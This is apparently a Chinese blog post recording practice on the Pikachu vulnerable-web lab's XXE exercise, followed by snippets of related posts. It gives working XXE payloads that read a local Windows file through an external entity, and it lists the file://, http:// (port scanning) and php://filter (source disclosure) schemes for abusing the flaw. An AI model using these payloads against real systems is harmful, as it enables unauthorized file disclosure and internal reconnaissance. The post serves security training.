Pikachu靶场练习记录--7--XXE(外部实体注入)

最新推荐文章于 2024-09-13 19:41:32 发布
最新推荐文章于 2024-09-13 19:41:32 发布
阅读量352 收藏 6
点赞数 15
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Quyu6666/article/details/141158257
版权

        1.简述

        XXE是外部实体注入漏洞,用户通过输入XML实体内容,编写代码时有没有进行过滤,导致的漏洞。

        利用和查看XXE漏洞的方法

                1.直接通过DTD外部实体声明

        <!DOCTYPE 根元素 SYSTEM "文件名">

        <?xml version ="1.0"?><!DOCTYPE ANY [
        <!ENTITY f SYSTEM "file:///C://Windows//win.ini" >]>

        <x>&f;</x>

                2.用BP抓包进行修改查看是否存在XXE漏洞

这是有回显的

        2.常见的三种协议

        file:///路径/file.ext    #读取文件
        http://xxx.com:80               #端口扫描
        php://filter/read=convert.base64-encode/resource=文件.php       #读取源代码

3.皮卡丘靶场演示

        1.利用简单的XML代码找到XXE漏洞

        2.利用XXE漏洞读取其他文件

        利用构建外部实体

<?xml version="1.0"?>
<!DOCTYPE a[
    <!ENTITY b SYSTEM "file:///C:/Windows/win.ini">
]>
<a>&b;</a>

与上文的常见的三种协议相结合,可以达到你的目的。 

喜欢喝粥.
关注
皮卡丘(pikachu)XXE
weixin_44787832的博客
07-23 2608
XXE漏洞 第一部分:XML声明部分 <?xml version="1.0"?> 第二部分:文档类型定义 DTD <!DOCTYPE note[ <!--定义此文档是note类型的文档--> <!ENTITY entity-name SYSTEM "URI/URL"> <!--外部实体声明--> ]> 第三部分:文档元素 <note> <to>Dave</to> <from>T
XXE漏洞练习
cxrpty的博客
02-26 821
实验环境:xml、Apache、Pika出漏洞练习平台 实验原理:该漏洞也被称为XML外部实体注入攻击漏洞,它是指XML代码的DTD声明外部实体实体内容为一些敏感的本地文件路径或攻击链接或127.0.0.1:端口 实验步骤: 1.XML值如下: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE name[ <!E...
pikachu XXE (XML外部实体注入)(皮卡丘漏洞平台通关系列)
箭雨镜屋
02-17 6776
一、来自官方的介绍以及来自民间的扩展 1、pikachu官方简介 2、小女子之前画的脑图 3、两个个人感觉不错的博客 https://www.freebuf.com/articles/web/177979.html https://lalajun.github.io/2019/12/03/WEB-XXE/ ...
Pikachu漏洞练习平台之XXE(XML外部实体注入
Welcome To Myon'Blog !
11-16 998
文档类型定义(DTD)可定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构,DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。内部的 DOCTYPE 声明:假如 DTD 被包含在 XML 源文件中DOCTYPE 根元素 [元素声明]>外部文档声明:假如 DTD 位于 XML 源文件的外部DOCTYPE 根元素 SYSTEM "文件名">]>
Pikachu--XXE漏洞
weixin_53736204的博客
07-25 1081
XML文档结构由XML声明,DTD(文档类型定义),文档元素三部分构成!--定义此文档是 note 类型的文档-->!ELEMENT--定义note元素有四个元素-->--定义to元素为"#PCDATA”类型-->!ELEMENT!ELEMENT--定义from元素为"#PCDATA”类型-->!ELEMENT--定义head元素为"#PCDATA"类型-->!ELEMENT--定义body元素为"#PCDATA"类型--></</</</</》》》XML特性《《《
pikachu靶场-10 XXE漏洞
weixin_52180702的博客
12-13 582
既"xml外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。
[pikachu靶场]xxe漏洞详解!!!
muyuchen110的博客
07-25 503
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxm|默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)、内网扫描等危害。
Pikachu靶场练习
qq_53859119的博客
09-12 1837
Pikachu靶场练习 自己学习用的,写不不好不准说我。 简介  Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 1、暴力破解 Burte Force(暴力破解)概述 “暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一
Pikachu靶场通关记录(详细)
热门推荐
ak.Gh0st的博客
10-31 1万+
Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。
pikachu靶场练习
qaq517384的博客
01-12 2537
pikachu靶场练习暴力破解基于表单的暴力破解 暴力破解 基于表单的暴力破解 随便输入一个用户名和密码,然后bp抓包 抓包送入intruder模块 选中第四个模式 为账号和密码分别导入自己的字典,就可以start attack开始爆破了 根据相应的长度判断是否登陆成功 爆破出一个简单的账号密码:admin/123456 ...
Pikachu靶场练习总结
weixin_47387913的博客
03-05 2935
Pikachu靶场练习总结 前辈们好!作为一个进入安全行业的初学者,靶场练习必不可少,我将我对某些靶场练习的总结写在这里,错误之处请多多指正。 靶场pikachu 关卡:暴力破解 基于表单的暴力破解: 先看提示: 用户名和密码我们都是不清楚的,可建立密码库利用burp中的Intruder功能进行暴力破解,先通过Proxy截取报文,发送到Intruder中。 因为用户名和密码都是不清楚的,那么我们要添加username和password2个爆破选...
攻防系列——pikachu靶场通关练习
weixin_43140411的博客
10-23 2032
从来没有哪个时代的黑客像今天一样热衷于猜解密码 ---奥斯特洛夫斯基
pikachu靶场练习通关加知识点总结
qq_45584159的博客
12-11 7854
pikachu靶场练习 文章目录pikachu靶场练习前言一.暴力破解1.1 基于表单的暴力破解1.2验证码绕过(on sever)1.3验证码绕过(on client)1.4tokon防爆破二、xssxss概述DOM:文档对象类型xss形成的原因:xss漏洞的测试流程:1.1反射型xss(get)1.2反射型xss(post)三.CSRF四.SQL注入五.RCE六.文件包含七.不安全的文件下载八.越权九.目录遍历十.敏感信息泄露十一,PHP反序列化十二.XXE十三.重定向十四.SSRF十五.管理工具
pikachu之XEE练习
weixin_51220765的博客
12-22 501
XXE (xml external entity injection)即xml外部实体注入漏洞 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题",也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。 以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部
AI在医学领域:医学AI的安全与隐私全面概述
声纹感知 洞察芯声
09-12 1408
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
【双语新闻】AGI安全与对齐,DeepMind近期工作
最新发布
qq_29883477的博客
09-13 1017
的开发和运行,包括危险能力评估)。这还没有达到我们的需求:诚实策略的时间复杂度只在人类可判断的论证长度上是多项式的,而我们希望它在AI可判断的论证长度上是高效的。我们已经看到了一些使用Tracr的例子,但其使用的范围并没有如我们所希望的那样广泛,因为由Tracr生成的模型与在野外训练的模型有很大的不同。:尽管这项工作未能实现其雄心勃勃的目标,即在超置的早期MLP层中机械地理解事实是如何计算的,但它确实提供了进一步的证据表明超置正在发生,并否定了关于事实回忆可能如何运作的一些简单假设。
Boot header格式描述详细信息。CSU DMA用于数据传输。安全流开关允许数据移动。PL配置通过PCAP接口。PL bit流包含设备配置数据。
lsh11111的博客
09-13 452
此外,BootROM可以使用8位并行配置中的宽度检测参数值和image识别参数值来检测Quad-SPI接口的预期I/O宽度。在Quad-SPI引导过程中,BootROM会根据宽度检测参数值来选择相应的I/O配置,以确保正确访问Quad-SPI设备。- Reserved for interrupts: 用于存储中断相关信息,特别是在LQSPI地址空间中的默认0x01F中断向量被更改时,在XIP启动模式下使用。- 安全头初始化向量: 用于PMU FW和FSBL的安全头的初始化向量。
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值